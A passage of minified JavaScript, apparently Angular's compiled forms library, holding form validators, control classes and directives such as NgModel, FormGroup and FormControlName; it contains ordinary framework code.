a.test(n)?null:{pattern:{requiredPattern:e,actualValue:n}}}}(a)}static nullValidator(a){return null}static compose(a){return eN(a)}static composeAsync(a){return tN(a)}}function BO(t){return a=>{if(ip(a.value)||ip(t))return null;const e=parseFloat(a.value);return!isNaN(e)&&e<t?{min:{min:t,actual:a.value}}:null}}function HO(t){return a=>{if(ip(a.value)||ip(t))return null;const e=parseFloat(a.value);return!isNaN(e)&&e>t?{max:{max:t,actual:a.value}}:null}}function UO(t){return ip(t.value)?{required:!0}:null}function E4(t){return null}function KO(t){return null!=t}function XO(t){return qC(t)?Sa(t):t}function YO(t){let a={};return t.forEach(e=>{a=null!=e?Object.assign(Object.assign({},a),e):a}),0===Object.keys(a).length?null:a}function JO(t,a){return a.map(e=>e(t))}function ZO(t){return t.map(a=>function mde(t){return!t.validate}(a)?a:e=>a.validate(e))}function eN(t){if(!t)return null;const a=t.filter(KO);return 0==a.length?null:function(e){return YO(JO(e,a))}}function K6(t){return null!=t?eN(ZO(t)):null}function tN(t){if(!t)return null;const a=t.filter(KO);return 0==a.length?null:function(e){return $6(JO(e,a).map(XO)).pipe(Xe(YO))}}function X6(t){return null!=t?tN(ZO(t)):null}function iN(t,a){return null===t?[a]:Array.isArray(t)?[...t,a]:[t,a]}function aN(t){return t._rawValidators}function nN(t){return t._rawAsyncValidators}function Y6(t){return t?Array.isArray(t)?t:[t]:[]}function D4(t,a){return Array.isArray(t)?t.includes(a):t===a}function oN(t,a){const e=Y6(a);return Y6(t).forEach(n=>{D4(e,n)||e.push(n)}),e}function rN(t,a){return Y6(a).filter(e=>!D4(t,e))}class sN{constructor(){this._rawValidators=[],this._rawAsyncValidators=[],this._onDestroyCallbacks=[]}get value(){return this.control?this.control.value:null}get valid(){return this.control?this.control.valid:null}get invalid(){return this.control?this.control.invalid:null}get pending(){return this.control?this.control.pending:null}get disabled(){return this.control?this.control.disabled:null}get enabled(){return this.control?this.control.enabled:null}get errors(){return this.control?this.control.errors:null}get pristine(){return this.control?this.control.pristine:null}get dirty(){return this.control?this.control.dirty:null}get touched(){return this.control?this.control.touched:null}get status(){return this.control?this.control.status:null}get untouched(){return this.control?this.control.untouched:null}get statusChanges(){return this.control?this.control.statusChanges:null}get valueChanges(){return this.control?this.control.valueChanges:null}get path(){return null}_setValidators(a){this._rawValidators=a||[],this._composedValidatorFn=K6(this._rawValidators)}_setAsyncValidators(a){this._rawAsyncValidators=a||[],this._composedAsyncValidatorFn=X6(this._rawAsyncValidators)}get validator(){return this._composedValidatorFn||null}get asyncValidator(){return this._composedAsyncValidatorFn||null}_registerOnDestroy(a){this._onDestroyCallbacks.push(a)}_invokeOnDestroyCallbacks(){this._onDestroyCallbacks.forEach(a=>a()),this._onDestroyCallbacks=[]}reset(a){this.control&&this.control.reset(a)}hasError(a,e){return!!this.control&&this.control.hasError(a,e)}getError(a,e){return this.control?this.control.getError(a,e):null}}class fm extends sN{constructor(){super(...arguments),this._parent=null,this.name=null,this.valueAccessor=null}}class Jc extends sN{get formDirective(){return null}get path(){return null}}class cN{constructor(a){this._cd=a}get isTouched(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.touched)}get isUntouched(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.untouched)}get isPristine(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.pristine)}get isDirty(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.dirty)}get isValid(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.valid)}get isInvalid(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.invalid)}get isPending(){var a,e;return!(null===(e=null===(a=this._cd)||void 0===a?void 0:a.control)||void 0===e||!e.pending)}get isSubmitted(){var a;return!(null===(a=this._cd)||void 0===a||!a.submitted)}}let Ta=(()=>{class t extends cN{constructor(e){super(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(fm,2))},t.\u0275dir=Ot({type:t,selectors:[["","formControlName",""],["","ngModel",""],["","formControl",""]],hostVars:14,hostBindings:function(e,i){2&e&&Ct("ng-untouched",i.isUntouched)("ng-touched",i.isTouched)("ng-pristine",i.isPristine)("ng-dirty",i.isDirty)("ng-valid",i.isValid)("ng-invalid",i.isInvalid)("ng-pending",i.isPending)},features:[ci]}),t})(),lN=(()=>{class t extends cN{constructor(e){super(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Jc,10))},t.\u0275dir=Ot({type:t,selectors:[["","formGroupName",""],["","formArrayName",""],["","ngModelGroup",""],["","formGroup",""],["form",3,"ngNoForm",""],["","ngForm",""]],hostVars:16,hostBindings:function(e,i){2&e&&Ct("ng-untouched",i.isUntouched)("ng-touched",i.isTouched)("ng-pristine",i.isPristine)("ng-dirty",i.isDirty)("ng-valid",i.isValid)("ng-invalid",i.isInvalid)("ng-pending",i.isPending)("ng-submitted",i.isSubmitted)},features:[ci]}),t})();const fy="VALID",w4="INVALID",C1="PENDING",py="DISABLED";function tx(t){return(I4(t)?t.validators:t)||null}function mN(t){return Array.isArray(t)?K6(t):t||null}function ix(t,a){return(I4(a)?a.asyncValidators:t)||null}function uN(t){return Array.isArray(t)?X6(t):t||null}function I4(t){return null!=t&&!Array.isArray(t)&&"object"==typeof t}class pN{constructor(a,e){this._pendingDirty=!1,this._hasOwnPendingAsyncValidator=!1,this._pendingTouched=!1,this._onCollectionChange=()=>{},this._parent=null,this.pristine=!0,this.touched=!1,this._onDisabledChange=[],this._rawValidators=a,this._rawAsyncValidators=e,this._composedValidatorFn=mN(this._rawValidators),this._composedAsyncValidatorFn=uN(this._rawAsyncValidators)}get validator(){return this._composedValidatorFn}set validator(a){this._rawValidators=this._composedValidatorFn=a}get asyncValidator(){return this._composedAsyncValidatorFn}set asyncValidator(a){this._rawAsyncValidators=this._composedAsyncValidatorFn=a}get parent(){return this._parent}get valid(){return this.status===fy}get invalid(){return this.status===w4}get pending(){return this.status==C1}get disabled(){return this.status===py}get enabled(){return this.status!==py}get dirty(){return!this.pristine}get untouched(){return!this.touched}get updateOn(){return this._updateOn?this._updateOn:this.parent?this.parent.updateOn:"change"}setValidators(a){this._rawValidators=a,this._composedValidatorFn=mN(a)}setAsyncValidators(a){this._rawAsyncValidators=a,this._composedAsyncValidatorFn=uN(a)}addValidators(a){this.setValidators(oN(a,this._rawValidators))}addAsyncValidators(a){this.setAsyncValidators(oN(a,this._rawAsyncValidators))}removeValidators(a){this.setValidators(rN(a,this._rawValidators))}removeAsyncValidators(a){this.setAsyncValidators(rN(a,this._rawAsyncValidators))}hasValidator(a){return D4(this._rawValidators,a)}hasAsyncValidator(a){return D4(this._rawAsyncValidators,a)}clearValidators(){this.validator=null}clearAsyncValidators(){this.asyncValidator=null}markAsTouched(a={}){this.touched=!0,this._parent&&!a.onlySelf&&this._parent.markAsTouched(a)}markAllAsTouched(){this.markAsTouched({onlySelf:!0}),this._forEachChild(a=>a.markAllAsTouched())}markAsUntouched(a={}){this.touched=!1,this._pendingTouched=!1,this._forEachChild(e=>{e.markAsUntouched({onlySelf:!0})}),this._parent&&!a.onlySelf&&this._parent._updateTouched(a)}markAsDirty(a={}){this.pristine=!1,this._parent&&!a.onlySelf&&this._parent.markAsDirty(a)}markAsPristine(a={}){this.pristine=!0,this._pendingDirty=!1,this._forEachChild(e=>{e.markAsPristine({onlySelf:!0})}),this._parent&&!a.onlySelf&&this._parent._updatePristine(a)}markAsPending(a={}){this.status=C1,!1!==a.emitEvent&&this.statusChanges.emit(this.status),this._parent&&!a.onlySelf&&this._parent.markAsPending(a)}disable(a={}){const e=this._parentMarkedDirty(a.onlySelf);this.status=py,this.errors=null,this._forEachChild(i=>{i.disable(Object.assign(Object.assign({},a),{onlySelf:!0}))}),this._updateValue(),!1!==a.emitEvent&&(this.valueChanges.emit(this.value),this.statusChanges.emit(this.status)),this._updateAncestors(Object.assign(Object.assign({},a),{skipPristineCheck:e})),this._onDisabledChange.forEach(i=>i(!0))}enable(a={}){const e=this._parentMarkedDirty(a.onlySelf);this.status=fy,this._forEachChild(i=>{i.enable(Object.assign(Object.assign({},a),{onlySelf:!0}))}),this.updateValueAndValidity({onlySelf:!0,emitEvent:a.emitEvent}),this._updateAncestors(Object.assign(Object.assign({},a),{skipPristineCheck:e})),this._onDisabledChange.forEach(i=>i(!1))}_updateAncestors(a){this._parent&&!a.onlySelf&&(this._parent.updateValueAndValidity(a),a.skipPristineCheck||this._parent._updatePristine(),this._parent._updateTouched())}setParent(a){this._parent=a}getRawValue(){return this.value}updateValueAndValidity(a={}){this._setInitialStatus(),this._updateValue(),this.enabled&&(this._cancelExistingSubscription(),this.errors=this._runValidator(),this.status=this._calculateStatus(),(this.status===fy||this.status===C1)&&this._runAsyncValidator(a.emitEvent)),!1!==a.emitEvent&&(this.valueChanges.emit(this.value),this.statusChanges.emit(this.status)),this._parent&&!a.onlySelf&&this._parent.updateValueAndValidity(a)}_updateTreeValidity(a={emitEvent:!0}){this._forEachChild(e=>e._updateTreeValidity(a)),this.updateValueAndValidity({onlySelf:!0,emitEvent:a.emitEvent})}_setInitialStatus(){this.status=this._allControlsDisabled()?py:fy}_runValidator(){return this.validator?this.validator(this):null}_runAsyncValidator(a){if(this.asyncValidator){this.status=C1,this._hasOwnPendingAsyncValidator=!0;const e=XO(this.asyncValidator(this));this._asyncValidationSubscription=e.subscribe(i=>{this._hasOwnPendingAsyncValidator=!1,this.setErrors(i,{emitEvent:a})})}}_cancelExistingSubscription(){this._asyncValidationSubscription&&(this._asyncValidationSubscription.unsubscribe(),this._hasOwnPendingAsyncValidator=!1)}setErrors(a,e={}){this.errors=a,this._updateControlsErrors(!1!==e.emitEvent)}get(a){let e=a;return null==e||(Array.isArray(e)||(e=e.split(".")),0===e.length)?null:e.reduce((i,n)=>i&&i._find(n),this)}getError(a,e){const i=e?this.get(e):this;return i&&i.errors?i.errors[a]:null}hasError(a,e){return!!this.getError(a,e)}get root(){let a=this;for(;a._parent;)a=a._parent;return a}_updateControlsErrors(a){this.status=this._calculateStatus(),a&&this.statusChanges.emit(this.status),this._parent&&this._parent._updateControlsErrors(a)}_initObservables(){this.valueChanges=new Tt,this.statusChanges=new Tt}_calculateStatus(){return this._allControlsDisabled()?py:this.errors?w4:this._hasOwnPendingAsyncValidator||this._anyControlsHaveStatus(C1)?C1:this._anyControlsHaveStatus(w4)?w4:fy}_anyControlsHaveStatus(a){return this._anyControls(e=>e.status===a)}_anyControlsDirty(){return this._anyControls(a=>a.dirty)}_anyControlsTouched(){return this._anyControls(a=>a.touched)}_updatePristine(a={}){this.pristine=!this._anyControlsDirty(),this._parent&&!a.onlySelf&&this._parent._updatePristine(a)}_updateTouched(a={}){this.touched=this._anyControlsTouched(),this._parent&&!a.onlySelf&&this._parent._updateTouched(a)}_registerOnCollectionChange(a){this._onCollectionChange=a}_setUpdateStrategy(a){I4(a)&&null!=a.updateOn&&(this._updateOn=a.updateOn)}_parentMarkedDirty(a){return!a&&!(!this._parent||!this._parent.dirty)&&!this._parent._anyControlsDirty()}_find(a){return null}}class R4 extends pN{constructor(a,e,i){super(tx(e),ix(i,e)),this.controls=a,this._initObservables(),this._setUpdateStrategy(e),this._setUpControls(),this.updateValueAndValidity({onlySelf:!0,emitEvent:!!this.asyncValidator})}registerControl(a,e){return this.controls[a]?this.controls[a]:(this.controls[a]=e,e.setParent(this),e._registerOnCollectionChange(this._onCollectionChange),e)}addControl(a,e,i={}){this.registerControl(a,e),this.updateValueAndValidity({emitEvent:i.emitEvent}),this._onCollectionChange()}removeControl(a,e={}){this.controls[a]&&this.controls[a]._registerOnCollectionChange(()=>{}),delete this.controls[a],this.updateValueAndValidity({emitEvent:e.emitEvent}),this._onCollectionChange()}setControl(a,e,i={}){this.controls[a]&&this.controls[a]._registerOnCollectionChange(()=>{}),delete this.controls[a],e&&this.registerControl(a,e),this.updateValueAndValidity({emitEvent:i.emitEvent}),this._onCollectionChange()}contains(a){return this.controls.hasOwnProperty(a)&&this.controls[a].enabled}setValue(a,e={}){(function fN(t,a,e){t._forEachChild((i,n)=>{if(void 0===e[n])throw new gi(1002,"")})})(this,0,a),Object.keys(a).forEach(i=>{(function hN(t,a,e){const i=t.controls;if(!(a?Object.keys(i):i).length)throw new gi(1e3,"");if(!i[e])throw new gi(1001,"")})(this,!0,i),this.controls[i].setValue(a[i],{onlySelf:!0,emitEvent:e.emitEvent})}),this.updateValueAndValidity(e)}patchValue(a,e={}){null!=a&&(Object.keys(a).forEach(i=>{const n=this.controls[i];n&&n.patchValue(a[i],{onlySelf:!0,emitEvent:e.emitEvent})}),this.updateValueAndValidity(e))}reset(a={},e={}){this._forEachChild((i,n)=>{i.reset(a[n],{onlySelf:!0,emitEvent:e.emitEvent})}),this._updatePristine(e),this._updateTouched(e),this.updateValueAndValidity(e)}getRawValue(){return this._reduceChildren({},(a,e,i)=>(a[i]=e.getRawValue(),a))}_syncPendingControls(){let a=this._reduceChildren(!1,(e,i)=>!!i._syncPendingControls()||e);return a&&this.updateValueAndValidity({onlySelf:!0}),a}_forEachChild(a){Object.keys(this.controls).forEach(e=>{const i=this.controls[e];i&&a(i,e)})}_setUpControls(){this._forEachChild(a=>{a.setParent(this),a._registerOnCollectionChange(this._onCollectionChange)})}_updateValue(){this.value=this._reduceValue()}_anyControls(a){for(const[e,i]of Object.entries(this.controls))if(this.contains(e)&&a(i))return!0;return!1}_reduceValue(){return this._reduceChildren({},(e,i,n)=>((i.enabled||this.disabled)&&(e[n]=i.value),e))}_reduceChildren(a,e){let i=a;return this._forEachChild((n,r)=>{i=e(i,n,r)}),i}_allControlsDisabled(){for(const a of Object.keys(this.controls))if(this.controls[a].enabled)return!1;return Object.keys(this.controls).length>0||this.disabled}_find(a){return this.controls.hasOwnProperty(a)?this.controls[a]:null}}function S4(t,a){return[...a.path,t]}function _y(t,a){var e,i;ax(t,a),a.valueAccessor.writeValue(t.value),t.disabled&&(null===(i=(e=a.valueAccessor).setDisabledState)||void 0===i||i.call(e,!0)),function bde(t,a){a.valueAccessor.registerOnChange(e=>{t._pendingValue=e,t._pendingChange=!0,t._pendingDirty=!0,"change"===t.updateOn&&_N(t,a)})}(t,a),function vde(t,a){const e=(i,n)=>{a.valueAccessor.writeValue(i),n&&a.viewToModelUpdate(i)};t.registerOnChange(e),a._registerOnDestroy(()=>{t._unregisterOnChange(e)})}(t,a),function Mde(t,a){a.valueAccessor.registerOnTouched(()=>{t._pendingTouched=!0,"blur"===t.updateOn&&t._pendingChange&&_N(t,a),"submit"!==t.updateOn&&t.markAsTouched()})}(t,a),function yde(t,a){if(a.valueAccessor.setDisabledState){const e=i=>{a.valueAccessor.setDisabledState(i)};t.registerOnDisabledChange(e),a._registerOnDestroy(()=>{t._unregisterOnDisabledChange(e)})}}(t,a)}function k4(t,a,e=!0){const i=()=>{};a.valueAccessor&&(a.valueAccessor.registerOnChange(i),a.valueAccessor.registerOnTouched(i)),O4(t,a),t&&(a._invokeOnDestroyCallbacks(),t._registerOnCollectionChange(()=>{}))}function P4(t,a){t.forEach(e=>{e.registerOnValidatorChange&&e.registerOnValidatorChange(a)})}function ax(t,a){const e=aN(t);null!==a.validator?t.setValidators(iN(e,a.validator)):"function"==typeof e&&t.setValidators([e]);const i=nN(t);null!==a.asyncValidator?t.setAsyncValidators(iN(i,a.asyncValidator)):"function"==typeof i&&t.setAsyncValidators([i]);const n=()=>t.updateValueAndValidity();P4(a._rawValidators,n),P4(a._rawAsyncValidators,n)}function O4(t,a){let e=!1;if(null!==t){if(null!==a.validator){const n=aN(t);if(Array.isArray(n)&&n.length>0){const r=n.filter(c=>c!==a.validator);r.length!==n.length&&(e=!0,t.setValidators(r))}}if(null!==a.asyncValidator){const n=nN(t);if(Array.isArray(n)&&n.length>0){const r=n.filter(c=>c!==a.asyncValidator);r.length!==n.length&&(e=!0,t.setAsyncValidators(r))}}}const i=()=>{};return P4(a._rawValidators,i),P4(a._rawAsyncValidators,i),e}function _N(t,a){t._pendingDirty&&t.markAsDirty(),t.setValue(t._pendingValue,{emitModelToViewChange:!1}),a.viewToModelUpdate(t._pendingValue),t._pendingChange=!1}function gN(t,a){ax(t,a)}function nx(t,a){if(!t.hasOwnProperty("model"))return!1;const e=t.model;return!!e.isFirstChange()||!Object.is(a,e.currentValue)}function yN(t,a){t._syncPendingControls(),a.forEach(e=>{const i=e.control;"submit"===i.updateOn&&i._pendingChange&&(e.viewToModelUpdate(i._pendingValue),i._pendingChange=!1)})}function ox(t,a){if(!a)return null;let e,i,n;return Array.isArray(a),a.forEach(r=>{r.constructor===an?e=r:function Ede(t){return Object.getPrototypeOf(t.constructor)===cg}(r)?i=r:n=r}),n||i||e||null}const xde={provide:Jc,useExisting:ja(()=>y1)},gy=(()=>Promise.resolve())();let y1=(()=>{class t extends Jc{constructor(e,i){super(),this.submitted=!1,this._directives=new Set,this.ngSubmit=new Tt,this.form=new R4({},K6(e),X6(i))}ngAfterViewInit(){this._setUpdateStrategy()}get formDirective(){return this}get control(){return this.form}get path(){return[]}get controls(){return this.form.controls}addControl(e){gy.then(()=>{const i=this._findContainer(e.path);e.control=i.registerControl(e.name,e.control),_y(e.control,e),e.control.updateValueAndValidity({emitEvent:!1}),this._directives.add(e)})}getControl(e){return this.form.get(e.path)}removeControl(e){gy.then(()=>{const i=this._findContainer(e.path);i&&i.removeControl(e.name),this._directives.delete(e)})}addFormGroup(e){gy.then(()=>{const i=this._findContainer(e.path),n=new R4({});gN(n,e),i.registerControl(e.name,n),n.updateValueAndValidity({emitEvent:!1})})}removeFormGroup(e){gy.then(()=>{const i=this._findContainer(e.path);i&&i.removeControl(e.name)})}getFormGroup(e){return this.form.get(e.path)}updateModel(e,i){gy.then(()=>{this.form.get(e.path).setValue(i)})}setValue(e){this.control.setValue(e)}onSubmit(e){var i;return this.submitted=!0,yN(this.form,this._directives),this.ngSubmit.emit(e),"dialog"===(null===(i=null==e?void 0:e.target)||void 0===i?void 0:i.method)}onReset(){this.resetForm()}resetForm(e){this.form.reset(e),this.submitted=!1}_setUpdateStrategy(){this.options&&null!=this.options.updateOn&&(this.form._updateOn=this.options.updateOn)}_findContainer(e){return e.pop(),e.length?this.form.get(e):this.form}}return t.\u0275fac=function(e){return new(e||t)(Ee(ys,10),Ee(ap,10))},t.\u0275dir=Ot({type:t,selectors:[["form",3,"ngNoForm","",3,"formGroup",""],["ng-form"],["","ngForm",""]],hostBindings:function(e,i){1&e&&he("submit",function(r){return i.onSubmit(r)})("reset",function(){return i.onReset()})},inputs:{options:["ngFormOptions","options"]},outputs:{ngSubmit:"ngSubmit"},exportAs:["ngForm"],features:[ki([xde]),ci]}),t})();function bN(t,a){const e=t.indexOf(a);e>-1&&t.splice(e,1)}function MN(t){return"object"==typeof t&&null!==t&&2===Object.keys(t).length&&"value"in t&&"disabled"in t}const lu=class extends pN{constructor(a=null,e,i){super(tx(e),ix(i,e)),this.defaultValue=null,this._onChange=[],this._pendingChange=!1,this._applyFormState(a),this._setUpdateStrategy(e),this._initObservables(),this.updateValueAndValidity({onlySelf:!0,emitEvent:!!this.asyncValidator}),I4(e)&&(e.nonNullable||e.initialValueIsDefault)&&(this.defaultValue=MN(a)?a.value:a)}setValue(a,e={}){this.value=this._pendingValue=a,this._onChange.length&&!1!==e.emitModelToViewChange&&this._onChange.forEach(i=>i(this.value,!1!==e.emitViewToModelChange)),this.updateValueAndValidity(e)}patchValue(a,e={}){this.setValue(a,e)}reset(a=this.defaultValue,e={}){this._applyFormState(a),this.markAsPristine(e),this.markAsUntouched(e),this.setValue(this.value,e),this._pendingChange=!1}_updateValue(){}_anyControls(a){return!1}_allControlsDisabled(){return this.disabled}registerOnChange(a){this._onChange.push(a)}_unregisterOnChange(a){bN(this._onChange,a)}registerOnDisabledChange(a){this._onDisabledChange.push(a)}_unregisterOnDisabledChange(a){bN(this._onDisabledChange,a)}_forEachChild(a){}_syncPendingControls(){return!("submit"!==this.updateOn||(this._pendingDirty&&this.markAsDirty(),this._pendingTouched&&this.markAsTouched(),!this._pendingChange)||(this.setValue(this._pendingValue,{onlySelf:!0,emitModelToViewChange:!1}),0))}_applyFormState(a){MN(a)?(this.value=this._pendingValue=a.value,a.disabled?this.disable({onlySelf:!0,emitEvent:!1}):this.enable({onlySelf:!0,emitEvent:!1})):this.value=this._pendingValue=a}},Rde={provide:fm,useExisting:ja(()=>Ea)},TN=(()=>Promise.resolve())();let Ea=(()=>{class t extends fm{constructor(e,i,n,r,c){super(),this._changeDetectorRef=c,this.control=new lu,this._registered=!1,this.update=new Tt,this._parent=e,this._setValidators(i),this._setAsyncValidators(n),this.valueAccessor=ox(0,r)}ngOnChanges(e){if(this._checkForErrors(),!this._registered||"name"in e){if(this._registered&&(this._checkName(),this.formDirective)){const i=e.name.previousValue;this.formDirective.removeControl({name:i,path:this._getPath(i)})}this._setUpControl()}"isDisabled"in e&&this._updateDisabled(e),nx(e,this.viewModel)&&(this._updateValue(this.model),this.viewModel=this.model)}ngOnDestroy(){this.formDirective&&this.formDirective.removeControl(this)}get path(){return this._getPath(this.name)}get formDirective(){return this._parent?this._parent.formDirective:null}viewToModelUpdate(e){this.viewModel=e,this.update.emit(e)}_setUpControl(){this._setUpdateStrategy(),this._isStandalone()?this._setUpStandalone():this.formDirective.addControl(this),this._registered=!0}_setUpdateStrategy(){this.options&&null!=this.options.updateOn&&(this.control._updateOn=this.options.updateOn)}_isStandalone(){return!this._parent||!(!this.options||!this.options.standalone)}_setUpStandalone(){_y(this.control,this),this.control.updateValueAndValidity({emitEvent:!1})}_checkForErrors(){this._isStandalone()||this._checkParentType(),this._checkName()}_checkParentType(){}_checkName(){this.options&&this.options.name&&(this.name=this.options.name),this._isStandalone()}_updateValue(e){TN.then(()=>{var i;this.control.setValue(e,{emitViewToModelChange:!1}),null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck()})}_updateDisabled(e){const i=e.isDisabled.currentValue,n=0!==i&&Eh(i);TN.then(()=>{var r;n&&!this.control.disabled?this.control.disable():!n&&this.control.disabled&&this.control.enable(),null===(r=this._changeDetectorRef)||void 0===r||r.markForCheck()})}_getPath(e){return this._parent?S4(e,this._parent):[e]}}return t.\u0275fac=function(e){return new(e||t)(Ee(Jc,9),Ee(ys,10),Ee(ap,10),Ee(Ls,10),Ee(Ma,8))},t.\u0275dir=Ot({type:t,selectors:[["","ngModel","",3,"formControlName","",3,"formControl",""]],inputs:{name:"name",isDisabled:["disabled","isDisabled"],model:["ngModel","model"],options:["ngModelOptions","options"]},outputs:{update:"ngModelChange"},exportAs:["ngModel"],features:[ki([Rde]),ci,sa]}),t})(),EN=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["form",3,"ngNoForm","",3,"ngNativeValidate",""]],hostAttrs:["novalidate",""]}),t})();const Sde={provide:Ls,useExisting:ja(()=>Ac),multi:!0};let Ac=(()=>{class t extends cg{writeValue(e){this.setProperty("value",null==e?"":e)}registerOnChange(e){this.onChange=i=>{e(""==i?null:parseFloat(i))}}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","type","number","formControlName",""],["input","type","number","formControl",""],["input","type","number","ngModel",""]],hostBindings:function(e,i){1&e&&he("input",function(r){return i.onChange(r.target.value)})("blur",function(){return i.onTouched()})},features:[ki([Sde]),ci]}),t})(),DN=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const rx=new ni("NgModelWithFormControlWarning"),Nde={provide:fm,useExisting:ja(()=>N4)};let N4=(()=>{class t extends fm{constructor(e,i,n,r){super(),this._ngModelWarningConfig=r,this.update=new Tt,this._ngModelWarningSent=!1,this._setValidators(e),this._setAsyncValidators(i),this.valueAccessor=ox(0,n)}set isDisabled(e){}ngOnChanges(e){if(this._isControlChanged(e)){const i=e.form.previousValue;i&&k4(i,this,!1),_y(this.form,this),this.form.updateValueAndValidity({emitEvent:!1})}nx(e,this.viewModel)&&(this.form.setValue(this.model),this.viewModel=this.model)}ngOnDestroy(){this.form&&k4(this.form,this,!1)}get path(){return[]}get control(){return this.form}viewToModelUpdate(e){this.viewModel=e,this.update.emit(e)}_isControlChanged(e){return e.hasOwnProperty("form")}}return t._ngModelWarningSentOnce=!1,t.\u0275fac=function(e){return new(e||t)(Ee(ys,10),Ee(ap,10),Ee(Ls,10),Ee(rx,8))},t.\u0275dir=Ot({type:t,selectors:[["","formControl",""]],inputs:{form:["formControl","form"],isDisabled:["disabled","isDisabled"],model:["ngModel","model"]},outputs:{update:"ngModelChange"},exportAs:["ngForm"],features:[ki([Nde]),ci,sa]}),t})();const Lde={provide:Jc,useExisting:ja(()=>lg)};let lg=(()=>{class t extends Jc{constructor(e,i){super(),this.submitted=!1,this._onCollectionChange=()=>this._updateDomValue(),this.directives=[],this.form=null,this.ngSubmit=new Tt,this._setValidators(e),this._setAsyncValidators(i)}ngOnChanges(e){this._checkFormPresent(),e.hasOwnProperty("form")&&(this._updateValidators(),this._updateDomValue(),this._updateRegistrations(),this._oldForm=this.form)}ngOnDestroy(){this.form&&(O4(this.form,this),this.form._onCollectionChange===this._onCollectionChange&&this.form._registerOnCollectionChange(()=>{}))}get formDirective(){return this}get control(){return this.form}get path(){return[]}addControl(e){const i=this.form.get(e.path);return _y(i,e),i.updateValueAndValidity({emitEvent:!1}),this.directives.push(e),i}getControl(e){return this.form.get(e.path)}removeControl(e){k4(e.control||null,e,!1),function Dde(t,a){const e=t.indexOf(a);e>-1&&t.splice(e,1)}(this.directives,e)}addFormGroup(e){this._setUpFormContainer(e)}removeFormGroup(e){this._cleanUpFormContainer(e)}getFormGroup(e){return this.form.get(e.path)}addFormArray(e){this._setUpFormContainer(e)}removeFormArray(e){this._cleanUpFormContainer(e)}getFormArray(e){return this.form.get(e.path)}updateModel(e,i){this.form.get(e.path).setValue(i)}onSubmit(e){var i;return this.submitted=!0,yN(this.form,this.directives),this.ngSubmit.emit(e),"dialog"===(null===(i=null==e?void 0:e.target)||void 0===i?void 0:i.method)}onReset(){this.resetForm()}resetForm(e){this.form.reset(e),this.submitted=!1}_updateDomValue(){this.directives.forEach(e=>{const i=e.control,n=this.form.get(e.path);i!==n&&(k4(i||null,e),(t=>t instanceof lu)(n)&&(_y(n,e),e.control=n))}),this.form._updateTreeValidity({emitEvent:!1})}_setUpFormContainer(e){const i=this.form.get(e.path);gN(i,e),i.updateValueAndValidity({emitEvent:!1})}_cleanUpFormContainer(e){if(this.form){const i=this.form.get(e.path);i&&function Ade(t,a){return O4(t,a)}(i,e)&&i.updateValueAndValidity({emitEvent:!1})}}_updateRegistrations(){this.form._registerOnCollectionChange(this._onCollectionChange),this._oldForm&&this._oldForm._registerOnCollectionChange(()=>{})}_updateValidators(){ax(this.form,this),this._oldForm&&O4(this._oldForm,this)}_checkFormPresent(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(ys,10),Ee(ap,10))},t.\u0275dir=Ot({type:t,selectors:[["","formGroup",""]],hostBindings:function(e,i){1&e&&he("submit",function(r){return i.onSubmit(r)})("reset",function(){return i.onReset()})},inputs:{form:["formGroup","form"]},outputs:{ngSubmit:"ngSubmit"},exportAs:["ngForm"],features:[ki([Lde]),ci,sa]}),t})();const Fde={provide:fm,useExisting:ja(()=>lx)};let lx=(()=>{class t extends fm{constructor(e,i,n,r,c){super(),this._ngModelWarningConfig=c,this._added=!1,this.update=new Tt,this._ngModelWarningSent=!1,this._parent=e,this._setValidators(i),this._setAsyncValidators(n),this.valueAccessor=ox(0,r)}set isDisabled(e){}ngOnChanges(e){this._added||this._setUpControl(),nx(e,this.viewModel)&&(this.viewModel=this.model,this.formDirective.updateModel(this,this.model))}ngOnDestroy(){this.formDirective&&this.formDirective.removeControl(this)}viewToModelUpdate(e){this.viewModel=e,this.update.emit(e)}get path(){return S4(null==this.name?this.name:this.name.toString(),this._parent)}get formDirective(){return this._parent?this._parent.formDirective:null}_checkParentType(){}_setUpControl(){this._checkParentType(),this.control=this.formDirective.addControl(this),this._added=!0}}return t._ngModelWarningSentOnce=!1,t.\u0275fac=function(e){return new(e||t)(Ee(Jc,13),Ee(ys,10),Ee(ap,10),Ee(Ls,10),Ee(rx,8))},t.\u0275dir=Ot({type:t,selectors:[["","formControlName",""]],inputs:{name:["formControlName","name"],isDisabled:["disabled","isDisabled"],model:["ngModel","model"]},outputs:{update:"ngModelChange"},features:[ki([Fde]),ci,sa]}),t})();const Vde={provide:Ls,useExisting:ja(()=>Ed),multi:!0};function RN(t,a){return null==t?`${a}`:(a&&"object"==typeof a&&(a="Object"),`${t}: ${a}`.slice(0,50))}let Ed=(()=>{class t extends cg{constructor(){super(...arguments),this._optionMap=new Map,this._idCounter=0,this._compareWith=Object.is}set compareWith(e){this._compareWith=e}writeValue(e){this.value=e;const n=RN(this._getOptionId(e),e);this.setProperty("value",n)}registerOnChange(e){this.onChange=i=>{this.value=this._getOptionValue(i),e(this.value)}}_registerOption(){return(this._idCounter++).toString()}_getOptionId(e){for(const i of Array.from(this._optionMap.keys()))if(this._compareWith(this._optionMap.get(i),e))return i;return null}_getOptionValue(e){const i=function Bde(t){return t.split(":")[0]}(e);return this._optionMap.has(i)?this._optionMap.get(i):e}}return t.\u0275fac=function(){let a;return 